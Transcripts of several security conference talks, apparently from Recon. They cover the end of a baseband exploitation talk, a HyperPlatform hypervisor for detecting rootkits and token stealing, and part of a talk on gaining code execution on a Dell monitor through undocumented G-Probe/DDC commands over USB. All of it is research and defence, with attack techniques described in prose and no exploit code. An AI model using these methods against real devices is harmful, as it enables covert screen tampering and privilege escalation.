And some of you may recall that the Replicant Android project at some point published an alleged backdoor, which was essentially a directory traversal attack in a remote file system (RFS) service that Samsung built on top of this IPC. Luckily, this is fixed by now, so it doesn't exist anymore, but it would have been an awesome way of escalating privileges, because then you can essentially read and write stuff on the application processor file system. So this is the kind of thing you're looking for. Now, for those of you who are interested in playing with this further, one thing that we found very useful if you want to debug any of the IPC messages that go between these cores: there's a very handy kernel debugfs file called svnet memdump, and this essentially gives you a full memory dump of all the IPC traces, so you can look at that. Interestingly enough, it will contain everything. If you call a number, it will contain the IPC message initiating that call, so it will contain the number. It also contains what networks were seen if you switch networks. This is nice for debugging; on the other hand, it is also a huge privacy problem, because it allows any unprivileged application on Galaxy devices right now to spy on users very effectively. So with that, I want to get to the final remarks. The intention of our talk was really to give an idea of what this actually takes and how you usually approach this topic. And I think I can speak for both of us here that our conclusion is that this is really not that special. You have the usual real-time operating system primitives that you can identify, but there's no mad baseband-ninja knowledge required. So we definitely encourage other people to do more research in this space, and to put a number behind it: the two of us worked part-time on this for three to six months. Depending on how you count, at three months I think we were at the point of pretty much understanding most of it, and we had found the bug. Then we were slacking off, thinking that the exploit was going to be a quick thing; unfortunately it took longer, as always, so we ended up at six months in total. And we definitely think that there's still a lot of space for future research here. I talked about the escalation; there are definitely a lot of things you can do there. What's also very interesting is target identification, because one thing that is going to be a problem, also at such contests, is when you go there: okay, what's the actual firmware version? It's not like you have one operating system that is just running the latest version of Adobe Reader. In the mobile space you have tons of OEMs and tons of different firmware versions depending on where the phone is actually coming from, and identifying that over the air and picking the right payload can be quite tricky. So having future research in that area would be quite useful. Yeah, as Daniel mentioned, this is not up yet, so give us some time. We are not the kind of people who say we are going to release everything and then you never hear anything back; we just didn't have the time to put this stuff on GitHub yet because of our travel. We will definitely release all of the IDA plugins and tools that we have used throughout this research, and hopefully people can build on that. And with that, I'm actually surprised we're well on time and we have time for questions as well. Are you talking about the network side?
Okay, so he was asking if we have like any idea of the attack surface on the network side. This is also an interesting thing. So if you think about that you can use your phone to like exploit a carrier, that's definitely a pretty interesting thing. I would expect honestly that it's equally bad as in the baseband research that we have seen over the years. Maybe it's even worse because nobody actually has a chance to look at this. I'm not sure though if we will ever see any of this because like acquiring carrier equipment is not that easy. So yeah. Okay, so you're talking about like a real end to end attack that doesn't require a base station. That's actually, that's a good question I think because a lot of the fear mongering that comes with basements I think somehow originates from that angle. But I think it's fair to say that most of the attack surface is actually not in end to end parts of the code. So people have been looking at SMS and things like that and you find the bugs there but you're way less flexible when it comes to like staging payloads for example, like sending another message. So that I think there's bugs there and there have been historically also some real remote memory corruptions there but I think that's not the vast majority of these and most of the attack services. One thing that's going to be very difficult is Nicol mentioned it's hard to sort of get access to what networks are actually doing and I mean still to these days and I guess if we should even like know more maybe I mean with our experience working out of vendor but still I have basically no idea of okay what kind of filtering do maybe this operator or the second or the third or whatever applies. So you can you know even if you consider you find some issue in some layers of the stack for example I talked about the information elements there are some of them which are actually on paper end to end so it would be possible that you in your Osmo-com device encoded IE and it could it could survive the entire network but it's a huge question mark because you don't really know what the carriers do so really testing them out effective I mean that's really hard and the other part of it is I think it's something that you could call I mean it's an interesting target but we have seen that last year a lot with stage fright I guess and some other examples that if you think about end to end if you go higher up the stack in the application layer actually it's a much much much richer attack surface so I would say I mean obviously Matt too is here as well I mean you guys have seen the talked on the OMADM stuff so you know end to an expectation of mobile phones with using nothing but a number or is definitely possible but if I had to do that I didn't think you the first thing you would think of is you know the baseband right any other questions all right great thanks guys thank you very much you you
|
In recent years, over-the-air exploitation of cellular baseband vulnerabilities has been a recurring topic in the security community as well as the media. However, since “All Your Baseband Are Belong To Us” in 2010, there has been little public research on exploiting cellular modems directly. Now, Breaking Band is back with a new season by popular demand. We will describe our methodology for reverse engineering the RTOS, starting from unpacking proprietary loading formats to understanding the security architecture and the operation of the real-time tasks, identifying attack surfaces, and enabling debugging capabilities. Through this, we’ll give you a complete walkthrough of what it takes to go from zero to zero-day exploit, owning the baseband of a major flagship phone, as we have done at Mobile Pwn2Own 2015.
|
10.5446/32745 (DOI)
|
So I'd like to welcome Satoshi Tanda back to Rekon returning after I think five years. So he's going to talk about hyper platform. Thanks. Yep, welcome to my talk. So before I start the talk, let me add one funny personal story. So this is a picture I took five years ago when I came here for Rekon for the first time. But this picture is not actually a picture in Montreal. This is a picture in Chicago. When I was heading to Montreal from Japan, I had to transfer my plane at the Chicago airport. And I was ready for this, but my flight delayed and I had to go to a different boarding gate from Japan. I originally had to go. And that was also my first time to visit different country and even take a plane. So I got confused and got lost in the airport and missed the flight. And ended up staying in the hotel in the nearby Chicago airport. That was a funny memory to me. And now, yeah, I'm pleased to be here without getting lost. I didn't go to Rekon.com. I managed to be here. So I am going to talk about open source hyper by the project named hyper platform. So if you are interested in Windows kernel, hyper by the system monitoring or some sort, you will be interested in. So in this talk, I am going to tell just a couple of things. So if you want to have more ability to monitor and control Windows system activities in a lightweight manner, hyper platform is for you. And hyper platform is a hyper by the design of a VM filter platform to utilize virtualization technology and write new types of monitoring tools on Windows easier and quicker. So that is basically what I am going to tell in this talk. So let me introduce myself quickly. I am Satoshi and reverse engineer interested in Windows kernel and I implemented hyper platform and I am working at Sophos as a threat researcher specializing in behavior-based malware detection. But this project is entirely done independently. So feel free to reach out to me directly. And Egoal, he is a core researcher and he is an independent researcher specializing in cyber security, especially memory forensic and root kit analysis. Unfortunately, he is unable to come here, but you can definitely reach out to him as well as me. So let me start with motivation. Why do you need yet another hyper by the project? So a few months ago, we had issues. We found that we still didn't have good tool to analyze Windows kernel activities. So in my case, I personally wanted to analyze Pachigar, not by my employer. My person wanted to analyze Pachigar. And Pachigar was a challenging component to reverse engineer because it doesn't allow you to modify Windows kernel in any way. So you can set neither break point or fork to monitor its activity. And Egoal, he also wanted to have a new tool to analyze Windows kernel because he constantly dealt with root kit for his research. Pachigar and Eida is always works, but it is always also time consuming. So those tools weren't quite efficient. But actually, a lack of tool wasn't a real issue because we kind of knew a solution to it. The solution was virtualization technology. So there are plenty of academic paper and analysis systems using virtualization technology. And also we knew that virtualization technology is just more than providing sandbox environment. So a lack of tool wasn't a real issue. The real issue was that there was no suitable hypervisor to utilize virtualization technology only for system monitoring purpose on Windows. So assume that you want to monitor a system by using virtualization technology on Windows. 
You need a hypervisor. But what options do we have? First off, there are a couple of good-looking commercial products, but obviously those are proprietary and not available to us. If you take a look at some existing lightweight hypervisors on Windows, those lack modern platform support; for example HyperDbg, which is a really awesome project, but it didn't support the 64-bit architecture. And if you take a look at more comprehensive hypervisor projects, those were just too large to understand and extend. If you are paid to do this, you will probably be okay, but if you want to do independent research, it's probably too time-consuming. Also, those projects weren't quite Windows-engineer friendly; they require, say, Cygwin to install and compile first. We found that Bochs was actually a kind of exception: Bochs was quite easy to compile, run and even understand, but it was just too slow for day-to-day usage. So to summarize, this is our list of challenges that we believed we should tackle, and we believed the community needed a solution to it somehow. So we decided to work on these problems, and as a solution we developed HyperPlatform. HyperPlatform allows you to monitor Windows system activities, including the kernel. It is open source and supports Windows 7 to 10 on both 64- and 32-bit architectures. And it is small enough; one of the nice things about this project is that you can compile it in Visual Studio without any third-party libraries, and it can be debugged just like a software driver. And it is fast. This is how HyperPlatform works. If you are familiar with the Blue Pill hypervisor, this is essentially quite similar. First, it is loaded into the kernel address space as a software driver, and then it enables the VMX operation mode of the processors. Once VMX operation mode is enabled, the processors start to treat the entire system as a virtual machine and invoke a registered handler routine upon occurrence of certain events, such as exceptions, execution of certain types of instructions, or access to system registers like control register 3. Those events are called VM exits, and HyperPlatform implements the handler, the VM exit handler in this example. To get a rough idea of how event handling works, this is pseudo code for the VM exit handler. When a VM exit happens, the processor invokes this handler directly and also gives it the context of the system, namely the values of registers, and the reason why the VM exit happened. According to this reason, the handler executes the real implementation of the handler for each event. You can extend this handler for your own purposes if you want, and you can understand HyperPlatform as a VM exit filtering platform. On top of HyperPlatform you can write extended logic only for the events you are interested in, for example the move-to-control-register-3 event, and you can forget about all the other events you are not interested in. This is essentially how HyperPlatform is used. Then, what is the advantage of using HyperPlatform, and why would you want to use it? A short answer is that you can do what you cannot do without virtualization technology. Firstly, VM exits are a new class of events you can filter. With HyperPlatform you can tell when a processor-level event occurs, and even just an access to memory if you configure extended page tables. Secondly, the VM exit handler is quite flexible: you can return a different register value against, say, an RDMSR instruction.
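Since the pseudo code itself isn't reproduced here, below is a hedged C sketch of what a VM exit dispatch routine of this kind typically looks like: read the exit reason, handle the few events you care about, resume the guest. The names are made up and the real HyperPlatform code (which is C++) is more involved; only the overall shape is the point.

#include <stdint.h>

/* Subset of Intel VM exit reason codes, used for illustration. */
enum { EXIT_REASON_CR_ACCESS = 28, EXIT_REASON_RDMSR = 31, EXIT_REASON_EPT_VIOLATION = 48 };

struct guest_context {
    uint64_t gp_regs[16];   /* guest general purpose registers */
};

static void handle_cr_access(struct guest_context *gc)    { (void)gc; /* e.g. CR3 write: process switch */ }
static void handle_rdmsr(struct guest_context *gc)        { (void)gc; /* optionally return a spoofed value */ }
static void handle_ept_violation(struct guest_context *gc){ (void)gc; /* memory access of interest */ }
static void resume_guest(struct guest_context *gc)        { (void)gc; /* VMRESUME in the real thing */ }

void vmexit_dispatch(struct guest_context *gc, uint32_t exit_reason)
{
    switch (exit_reason) {
    case EXIT_REASON_CR_ACCESS:     handle_cr_access(gc);     break;
    case EXIT_REASON_RDMSR:         handle_rdmsr(gc);         break;
    case EXIT_REASON_EPT_VIOLATION: handle_ept_violation(gc); break;
    default:                        /* events we don't care about */ break;
    }
    resume_guest(gc);
}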
And you can also return different memory contents against a memory read operation in the system. Importantly, none of this is easy to implement without virtualization technology, but with VT it is quite straightforward. By utilizing those capabilities, you can implement meaningful logic for your own purposes on top of HyperPlatform. So let me share some ideas and example applications implemented on top of HyperPlatform. The primary application I can think of is kernel code analysis, for example detection of certain instruction execution. For instance, malware and rootkits often modify the value of control register 0 to disable memory write protection, but this is quite uncommon during normal system execution, so you can detect that event with VT and then investigate further. Another application is detection of pool execution. By using EPT you can catch execution of memory, and then you can check whether the address being executed is backed by any image or just by kernel heap, which is called pool. If it is just backed by pool, it is quite suspicious, so you can investigate this region further as well. With this technique you can get unpacked rootkit code out of memory pretty quickly; I will demonstrate it shortly. As a more advanced application of EPT, you can implement invisible API hooks. If you are interested in that project, please check out its GitHub page, DdiMon. So let me demonstrate MemoryMon, which is able to detect execution of pool memory, using a real rootkit driver. All right, so let's run 64-bit Windows 7. In this demo I am going to run malware which is packed, and then I will get the unpacked code extracted from memory using MemoryMon, which uses EPT. This is the driver file, the malware rootkit file, and this is the corresponding IDA database. If you take a look at the list of strings, you can see that it is pretty short, and most of the contents of the file are just data. Those are quite strong signs of a packed file. Then let's load MemoryMon. MemoryMon usually doesn't show many logs, because execution of non-image memory is quite uncommon on a normal system. But if you run this malware, MemoryMon starts to show lots of logs. Each log entry represents execution of memory outside of any driver file. So let's take a look at this entry. This entry indicates that somebody executed this address and it is not backed by a driver file; it is just pool. So let's take a look at the contents with the local kernel debugger. The contents look like the entry point of a function on the heap, which is quite suspicious. So let's take a dump of this region: this address, rounded to the page boundary, going a little bit backward, and taking one megabyte. That extracts the memory contents dumped to a file. If you give it to IDA and load it at the right address, and take a look at the executed address, you can see a nice function structure. Also, if you take a look at the list of strings in this memory region, you can see many interesting strings, and we didn't see those strings in the static file. So it is likely that these contents are unpacked rootkit code extracted from memory. You can write this kind of tool to assist your reverse engineering. Apart from code analysis, you can implement hypervisor-based protection if you are interested in that, by, for example, terminating a process instead of just monitoring.
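Before moving on to the protection example, the core check MemoryMon performs can be pictured with a small sketch like the one below: on an EPT execute violation, ask whether the faulting address falls inside any loaded driver image and flag it if not. The structures and the lookup are simplified stand-ins, not the project's actual code.

#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

struct driver_range { uint64_t base; uint64_t size; };

/* Hypothetical snapshot of loaded-driver ranges (e.g. built from the
 * kernel's loaded module list at startup). */
static const struct driver_range g_drivers[] = {
    { 0xfffff80000000000ull, 0x800000ull },
};

static bool backed_by_driver_image(uint64_t addr)
{
    for (size_t i = 0; i < sizeof g_drivers / sizeof g_drivers[0]; i++)
        if (addr >= g_drivers[i].base &&
            addr <  g_drivers[i].base + g_drivers[i].size)
            return true;
    return false;
}

/* Called from the EPT-violation path when the violation was an execute access. */
void on_execute_violation(uint64_t guest_rip)
{
    if (!backed_by_driver_image(guest_rip)) {
        /* Pool/heap execution: log it so the analyst can dump the region. */
    }
}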
EopMon is such an example. EopMon can detect successful exploitation of a privilege escalation vulnerability by checking the token field of a process structure in the kernel. EopMon performs the token field check when the process currently executing on the processor is changed. When the current process is being switched, Windows also updates the value of control register 3, and because control register 3 is a system register, that triggers a VM exit. EopMon then checks the process that is ending its execution, and the system repeats this cycle for each process. Whenever EopMon detects token stealing, so a successful privilege escalation, it terminates the process. In the case of EopMon, the VM exit is just a trigger point to perform a scan; EopMon doesn't even use the value of control register 3. It's just a handy timer-like event. So let me quickly demonstrate EopMon with real malware. I am going to run a Gozi sample, which exploits a local kernel privilege escalation vulnerability. All right, so this is 32-bit Windows 7. First I am going to run the malware without EopMon and show successful exploitation. Now we have a command prompt running with low integrity, so if you start any process from this command prompt, the child process is also going to be low integrity. But this malware, this one, exploits a system vulnerability and gets system privileges first, then spawns a system-privileged explorer.exe. Now let's run the same sample with EopMon. EopMon is also implemented on top of HyperPlatform. We run the same malware and see if it is going to be detected. So now I executed the malware, the same sample, PID 1864, and it starts its exploitation, and hopefully EopMon protects the system. Now the malware couldn't spawn explorer.exe, because EopMon detected the exploitation and terminated the process before the malware could do really bad things. So you can write this kind of protection or tool by using HyperPlatform. Okay. So let me briefly touch on some limitations of this project. First of all, it cannot run inside VirtualBox, because VirtualBox doesn't support nested virtualization, so you simply cannot run this project inside VirtualBox. It also doesn't support AMD processors. And thirdly, it cannot run with other hypervisors on the same box simultaneously. I am trying to find the time to fix this issue, but at this time it is a limitation: you cannot run HyperPlatform and VirtualBox or VMware at the same time on the same box. As for the future of this project, I hope to see more use of it from the community in any way, and I am looking forward to hearing more feedback and ideas on what you can do with HyperPlatform. I have some ideas. For example, we could probably write a kernel code coverage monitor for effective fuzzing using Intel Processor Trace, or we could write memory access visualization and analysis tools; actually, Igor is working on that at this moment. We could probably also use HyperPlatform for bug discovery, especially race-condition type bugs, by analyzing memory access patterns with extended page tables. But those are all yet to be planned, so I am looking forward to hearing more feedback and comments on this project. So let me wrap up the talk.
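Before the wrap-up, here is a sketch of the EopMon idea with heavily simplified stand-ins for the EPROCESS bookkeeping: on each CR3-change VM exit, compare the token a process carries now against the token it was created with, and treat a sudden switch to the System token as an escalation. The helper names and fields are assumptions, not the real implementation.

#include <stdint.h>
#include <stdbool.h>

struct tracked_process {
    void    *eprocess;        /* kernel EPROCESS pointer              */
    uint64_t original_token;  /* token value recorded when first seen */
};

/* Hypothetical helpers the hypervisor-side code would provide. */
extern uint64_t read_process_token(void *eprocess);   /* EPROCESS token field */
extern uint64_t system_process_token(void);           /* token of the System process */
extern void     terminate_process(void *eprocess);

/* Called on the CR3-write VM exit, i.e. whenever a context switch happens. */
void on_process_switch(struct tracked_process *prev)
{
    uint64_t now = read_process_token(prev->eprocess);

    /* Token swapped to the System token after creation: classic token stealing. */
    if (now != prev->original_token && now == system_process_token()) {
        terminate_process(prev->eprocess);
    }
}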
So virtualization technology is powerful but still underutilized technology for reverse engineering and hyper platform is a hyper visor designed as a VM exit filtering platform. And yeah, you can utilize virtualization technology and write new types of tools on Windows quickly and easily. And yeah, if you are interested in, please check out GitHub web page. It is open source. And yeah, develop your own unique ideas and solutions. Yeah, that is all I have. Thank you. Thank you. Thank you.
|
We will present a HyperPlatform, which is an advanced system monitoring platform for Windows Operating System (OS). Using Intel VT-x and Extended Page Table (EPT) technologies, this platform provides speedy monitoring of various events. HyperPlatform is hidden and resilient to modern anti-forensics techniques and can be easily extended for day-to-day reverse engineering work. Even nowadays, there are no suitable tools to analyze a kernel-mode code for many of researchers. Steady growth of ring0 rootkits requires a fast, undetectable and resilient tool to monitor OS events for all protection rings. Such a tool will significantly contribute to reverse-engineering. While existing virtualization infrastructures such as VirtualBox and VMware are handy for analysis by themselves, VT-x technology has much more potential for aiding reverse engineering. McAfee Deep Defender, for example, detects modification of system critical memory regions and registers. These tools are, however, proprietary and not available for everyone, or too complicated to extend for most of the engineers. HyperPlatform is a thin hypervisor, which has a potential to monitor the following: access to physical and virtual memory; functions calls from user- and kernel-modes; code execution in instruction granularity. The hypervisor can be used to monitor memory for two typical use cases. The first one is monitoring access to specified memory regions to protect system critical data such as the service descriptor table. The second case is recording any types of memory access from a specified memory region such as a potentially malicious driver to analyze its activities. Also, HyperPlatform is capable of monitoring a broad range of events such as interruptions, various registers and instructions. Tools based on HyperPlatform will be able to trace each instruction and provide dynamic analysis of executable code if necessary. We will demonstrate two examples of adaptation of HyperPlatform: MemoryMon and EopMon. The MemoryMon is able to monitor virtual memory accesses and detect dodgy kernel memory execution using EPT. It can help rootkit analysis by identifying dynamically allocated code. The EopMon is an elevation of privilege (EoP) detector. It can spot and terminate a process with a stolen system token by utilizing hypervisor’s ability to monitor process context-switching. Implementing those functions used to be challenging, but now, it can be achieved easier than ever using HyperPlatform.
|
10.5446/32747 (DOI)
|
Hi, guys. Sorry for the delay. Before we start the talk, I just wanted to let you know that we will be giving this awesome artistic thing born in version 2 if you answer all our questions. So please pay attention. It's very hard. You guys will never get it. Hey, I just want to make a quick announcement before I introduce these guys. Just a reminder that there's an event tonight at 9 at the SAT, which is where the concert was last night. And it's at the Satisfier for those of you who have been there before. In the past, it's an experience. So with that, I'd like to introduce Aung Chua, Francois Chavono, and Jethin Kataria, who will be talking about monitors. So thanks. Okay. Yes. Like Jaden said, we're going to give out that really cool thing if you answer one really hard question. The title of our talk is a Monitor Darkly, and here is the cast of characters. Okay. I'm Aung. Jaden is trying to set up the demo down over there. Strong Francois is right here. I'm not going to do that. He's a Canadian. He's great. Okay. And this is Igor from HexRays, and I've never met Igor, so we just kind of made him up. Not in person. I speak to him over email a lot. Here is a concerned area man named Chris. He will be part of the story. And an area man of concern, Shaquib, which will also be part of our story. Okay. So primary main objective, right? We're going after monitors. That's what this talk is about. You know, why monitors? What is this? Is this really a security problem? You know, that's what we're here to talk about. So I thought, you know, in retrospect, you know, why I did the monitor thing, and I think it had a lot to do with, you know, back in the day, I used to exist in cubicle life. It was very sad. I found a picture of my actual hedge fund cubicle office thing, right? And I think that was my actual desk, and it contains actual sadness. And I think I went back to school. I, you know, maybe subconsciously wanted to dismantle cubicle life technology. So Jadon and I at Columbia University did a lot of work on Cisco phones. We looked at HP printers, and, you know, we did some work with Cisco routers. So the last thing that's left in that picture, right, is the monitors. So the monitor is going down today. That's what we're doing. But in more of a, you know, a serious note, right, let's look at this website. Okay. It's chase.com. There's a green little lock over there. Greening's good. I would probably, you know, posit that we've probably spent about a billion dollars creating all of the technology, the infrastructure, the support, the kernel, all the technology to support an infrastructure where we can put a green icon on that browser window, right? So we can feel safe about encryption. Looking at the lens in which we see this browser through, right, it's a monitor. So you know, if you want to compromise the system as a whole, right, maybe let's look at the minimum cost of one billion dollars for the crypto and all the infrastructure and all the security we put around the kernel and the browser, and maybe whatever the cost of bypassing the security and the monitor is. Maybe it's a lot. Maybe it's a little. And that's what we're here to talk about. Okay. And, right, a good hacker is a lazy hacker. So instead of going after the kernel and the browser to change the pixel from that end, let's see if we can just change the pixel, you know, and the screen itself. Okay. So this story starts back in 2015, right, we're traveling back through time. Right. 
So I get this really sweet new monitor in my office, right. In fact, I think Jodin has one too. And we look at it, we plug it into our machine. And the first thing that it says is, ah, USB to I2C solution from Texas Instrument and also TU, you know, what is it, like a 3410 boot device, right? So we look at that and we say that's pretty cool. That's very interesting. And then like a minute of Googling later, we find this post from Dell Support Forum. Right. And they said, don't worry about it. You can download this like weird driver. But really, you know, we only use it for firmware update and you should never need this. So everything's fine. Right. And I also thought, huh, that's also really interesting. So you know, I say to Jodin, hey, Jodin, let's tear down that spare 34 inch monitor we have in the office. But we already have a suite monitors. Why don't we take out that 34 inch? Yeah. Like who cares? And then every man concerned, every man Chris overhears this conversation and he says, like, have you guys no hearts? Like there's no end to your, your senseless savagery. And also I have a million then plugins and I'm very sad. Okay. And then I said, oh, that's the saddest story I've ever heard. Why about, how about interns? Let's give it, let's do it to the interns, right? They won't be sad. So right. This is our intern pit. We love these people. They're very talented, dedicated people working in our office. And it just so happens that the interns get standard issue, you know, Dell U2410 monitors. Okay. And, you know, like 15 minutes of Googling later, we find this really very informative document that says, you know, Dell U2410 USB firmware upgrade instruction, right? It is so clear that I think it's almost like insultingly clear because if you look at this instruction literally says like you plug the power cord in the power cord wall thing, okay, as a step, right? And then you do the rest. But the rest of the document, very informative. They actually show screenshots of this tool that Dell released to do firmware update, right? Lots of very useful information, like if you look up there, the name of the firmer image, right? So, you know, if we can find it, we maybe can do this process and figure out how, you know, a firmware update works on a monitor. Very interesting things. App test, right? Super sneaky command, OX500, who knows what that does, right? But whatever this thing is, this process takes firmware, copies it from USB and puts it directly into persistent storage on your monitor. And we thought that's kind of cool. Okay, so we do more Googling. You know, we find all sorts of things like Genesis and then G-Probe and then this hardware from the 90s, right? This thing takes a 12-volt power supply, right? And then it has a parallel port and it goes to VGA and some other mystery dongle. Every vendor, you know, every manufacturer of monitor makes something sort of secretly similar to this, but it's not the same. And we found this in tons and tons of monitors made, you know, like late 90s, early 2000s. Okay, more Googling, we find STMicrobe somehow is involved, Inolux is there, Athena is the thing that, you know, STMicrobe makes and then somehow all of this stuff ended up in a Dell monitor. Okay, so, what's a little bit Googling, this is what we found, the string app test, right? That's where we started. That's part of a tool that G-Probe or Genesis created called G-Probe, okay? 
And this, you know, in the early 2000s, appeared to be a very industry standard type of software that people used to manage the software running on monitors. Okay, more Googling later and this is the story. So Genesis Inc. was operating and at around 2002, they sold themselves to STMicrobe, right? But they were also the people who created G-Probe and they were very active in creating the VESA standard for this protocol called DDC, which I'll talk about, right? And then STMicrobe, you know, Genesis in 2008, right, they took their own IP and G-Probe and stuff that they wanted to mix together and created this chip called STDP600 or 6DXX and 880XX and then that was put into Inolux board and Inolux is a company that designed these screen controllers, which is, you know, partially owned by Foscon and then later, you know, Dell sourced Inolux board right into the Dell monitor. And this is kind of the reason why we have terrible security, you know, in monitors today, this mishmash of, you know, where this technology came from. And you know, we got a copy of G-Probe just by looking around and Googling. That's what it looks like. You know, it has the ability to connect to the device, in this case, the monitor over, you know, parallel stereo USB. Basically the story is, as long as there's some way to get onto the I2C bus of the monitor, G-Probe can update the firmware and do all sorts of other diagnostics, which is cool. Okay, and then we took the USB firmware tool. We captured the USB traffic, right? And it's very noisy, lots and lots of traffic. And this is a capture of like a snippet, tiny snippet of firmware update process. And before we get into the details of that, let me just brief story about DDC. DDC stands for Display Data Channel, right? It's a standard that, you know, was created by Vesa, and there are many versions and subversions of DDC. There's DDC version one, two, I think three, and then two B and subversions, you know, BI, B plus, AB, blah, blah, blah. Who knows? Okay, but now let's look at what a packet that has this information looks like going over the USB port. So this is a SCSI command, which is sent using USB master storage protocol over USB. And then this is another packet, which encapsulates DDC2BI packet, which has a payload of Gpro packet, with which you can, you know, ask about like register read or you want to do like run code or anything like that. This is a DDC2BI packet structure, which contains a DDC destination source, length, VCP prefix, which is like virtual control panel, and the Gpro message, and it checks that packet. So let me tell you like how you do a small command and talk to the monitor about this. Very simple command. Very simple command. It's basically a monitor asked, hey, I want to talk to you by sending a vendor specific CF code and ask for a register read. As a SCSI command. As a SCSI command. And then monitor says that I acknowledge that you want to talk to me. And monitor says, PC says that I acknowledge that you acknowledge that you want to talk to me. And I also acknowledge that you want to do register read. Over. So the last two packets is like end of transmission for the acknowledgement of the request command. And then again, and then again, the PC says, could you please give me a response by first sending a SCSI command and then asking for a get response command. And it says that I acknowledge that you want to get a response. So it says that I acknowledge that you acknowledge that you want a response. So here is the response. Over. Yes. 
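Before counting up how many packets that simple exchange takes, here is a rough C rendering of a DDC/CI (DDC2Bi) frame wrapping a G-Probe message, plus the simple XOR-style checksum such buses commonly use. The field order, the VCP prefix and the checksum convention here are best-effort guesses from the description above, not a verified wire format.

#include <stdint.h>
#include <stddef.h>

struct ddc2bi_packet {
    uint8_t dest;         /* I2C destination address                    */
    uint8_t src;          /* source address                             */
    uint8_t len;          /* payload length, high bit often set         */
    uint8_t vcp_prefix;   /* marks this as a vendor/VCP message         */
    uint8_t payload[122]; /* G-Probe command bytes (opcode + operands)  */
    uint8_t checksum;     /* simple XOR over the preceding bytes        */
};

/* XOR checksum over a byte range; DDC/CI uses a scheme of this flavor,
 * though the exact seed and coverage should be checked against a capture. */
static uint8_t ddc_checksum(const uint8_t *bytes, size_t n)
{
    uint8_t c = 0;
    for (size_t i = 0; i < n; i++)
        c ^= bytes[i];
    return c;
}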
So 12 packets, right? To do this very simple command. And we saw this over USB; we figured that out. And now we decided it was time to take apart some poor intern's monitor and see what we see. So if you take off the back cover, this is what our monitor looked like. The logic analyzer and the Bus Pirate did not come standard; that's ours, we put that in there. Yeah. On the top you have all the standard power equipment, right? On the side is this little USB controller, which we'll get back to. And on the bottom is a USB hub. And that big old thing with the aluminum heatsink, that's the SoC. That's the thing that we want to execute code in. And then Francois mapped out all the different parts, right? So the main SoC is the STDP8028, right? And right next to it is the multiplexer for I2C, and connected to that via I2C is this USB2649, which is a programmable controller slash hub, right? And that's the thing on the side of the monitor that you can plug a CF card into. But we're connected on the left side at the bottom. Exactly. So that one is a dumb USB hub, right? Which we'll get to. So when Jatin sends this packet as the URB packet, what happens is the packet goes through the USB hub. The reason why the first command is an undocumented SCSI 0xCF command is that it goes through the hub to the 2649 over USB, right? And that puts that device into a super sneaky I2C instruction receive mode. Okay. And the second packet that you send, if it's the right format over URB, gets sent through the hub to the controller. The controller then decapsulates that packet, takes the raw I2C message, puts it right on the I2C bus and sends it directly to the microcontroller, the SoC. And that's why you have so many packets. Basically, you send this thing and the USB controller actually does the decapsulation. This allows you to put whatever I2C message you want onto the bus. And if you can do I2C messages, then you can communicate with the SoC, right? And we'll show you what you can do with that. We flipped the board over and found a two-megabyte SPI flash, right? So we did the obvious thing, dumped the flash. And this is what an in-house entropy analyzer that we have renders: entropy. White is really random, black is not random at all, right? Just right off the cuff, looking at the image, that's obviously some kind of weird table structure, so we're interested in that. This kind of looks like code, right? Three different segments of code. Who knows what it does? This is probably data, right? It's a little bit low entropy. And this thing looks like some sort of compressed data, so we're interested in that as well. The next obvious thing is, let's do strings, right? And we found exactly what we wanted to find. Mars, right, is the internal designation for the board class, I'm guessing. And in fact, the firmware update tool ships with Mars.hex, which is a small driver that allows you to communicate with the board. Dell 2410. And if you look at the other commands, right, you have really cool stuff like gm_OSD_show and OSD_hide, right? Those are exactly the kind of functions that we want to play with. So we do the next obvious thing: let's open it up in IDA, right? And IDA didn't really like it. And I don't like x86 either, that's why. You know, right? It didn't really do well with this assembly. And the reason why is because this is Turbo 186, right?
Which is an 16-bit x86 system that can extend to either 24-bit, right? 24 or 20? Yeah, 24 bits for a segment select. So it does all sorts of funky stuff. And I didn't really know what to do with it. And then I Googled a little. It turned out somebody in 2008 exactly when SD Micro, bot, Genesis, and all this stuff posted on OpenRC with a very specific question about a very specific file. So I'm guessing somebody probably worked on this in 2008 and Igor wrote a very reasonable response. Like, this is how IDA works. And Turbo 186 is blah, blah, blah. Just do this. And then I looked at it, I looked at x86 and I'm like, ah, I don't want to do this anymore. I'm going home, right? Because I'm not a fan of working with x86 in general. And then a year passes because I didn't do it, right? 2016. And Jad and I were sitting around and we really, this wouldn't sit well with us. We wanted to know how the stupid computer works. We have to do x86 this time. So we're like, I don't know. I just ask, oh fuck. Ah, oh fuck. And then oh fuck didn't respond. And Igor did. And Igor just wrote this very long, insightful explanation of exactly the innards of IDA and how to do Turbo 186. And he was even nice enough to actually disassemble Mars, that hex, that IDB, just to show us that, look idiots, you could just do this. Obviously. So, you know, we did it. And if you know IDA rate, like so many segments, that's definitely not what you want to see. Like we failed. It was hard. And then. Oh fuck. And you got, please don't look at this slide. Because I basically put cross references in every function. There was no visualization. So I just added a hotkey which did in place calculations to find, do the jumps. And as documented in the G-Probe documentation we found was register read through which we can read any registers. We can put EIP anywhere we want. So definitely there is code execution. And this is one of the commands we found which is undocumented through the Dell upgrade tool, which allowed us to put shell code in the OCM, in the memory of the monitor. So keep in mind this is all just straight, standard G-Probe interface. Right? It has run code. It has read memory. It has write memory. It's all legitimate communication. We're not exploiting anything. So the next thing we say is, okay, let's write a hello world program. So we found this really cool app test, which is a way to run diagnostics. And the app test is OST file, a fill rectangle. Let's do a rectangle with color in it. That's exactly what we want to do. And then Jotun says. Let's do RAM write. Let's learn shell code and hijack it. Yeah. And then it worked, but it was really gross. And if you're a little bit hungover from last night, it's going to get worse. But this is kind of what it looked like. We had to look at this and debug it for hours and hours. And it'll make you puke. It did once. We don't know why it blinks, by the way. Yeah. Jotun, why does it? Science. Science. Right? Okay. So at this point, this is what we know about the firmware. We got it more or less disassembled. We have this range of 80000 to be 00000. And then we saw pretty quickly that there were all these little far calls to the F000 range. And we were really curious about that because that's not part of the firmware. And it's definitely something that's part of the SOC that the firmware update process doesn't even touch. So I said, huh, let's dump some data. Definitely. I have registered read. I can dump data through USB. And then he did. Dump. Wait for it. I'm dumb. 
